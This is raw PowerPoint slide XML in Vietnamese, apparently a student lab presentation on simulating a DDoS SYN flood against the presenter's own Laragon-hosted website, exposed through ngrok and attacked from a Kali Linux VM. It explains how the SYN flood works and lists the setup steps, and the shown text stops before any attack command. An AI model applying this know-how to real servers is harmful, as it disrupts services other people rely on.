            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mô</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phỏng</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phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thêm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ddos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rút</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phòng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chống</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hiệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quả</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khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhắm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhóm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tội</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phạm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85725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AE13E-F9B3-4431-B881-58EC457E7ABE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="588335"/>
            <a:ext cx="9930809" cy="6046381"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Đặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>điểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ddos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> SYN Flood (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>nhóm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>giao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>thức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>thuộc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tầng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> ):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Kẻ tấn công gửi một lượng lớn các gói tin SYN (bắt đầu quá trình bắt tay TCP) mà không hoàn tất quá trình bắt tay ba bước, làm cho máy chủ phải giữ kết nối "nửa mở" và sử dụng hết tài nguyên.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Đầu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tiên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>laragon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phát</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>triển</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Khởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Khởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ngrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ngrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ngrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> http 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ngrok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Khởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ảo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cài</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ảo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vitualbox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Lúc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mở</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ngrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 18a3-14-224-53-137.ngrok-free.app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Toàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bộ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://18a3-14-224-53-137.ngrok-free.app/register.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ở </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đây</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tôi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SYN Flood: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghĩa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thầm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lặng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gửi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhỏ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhưng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gửi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>liên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gửi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>liên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
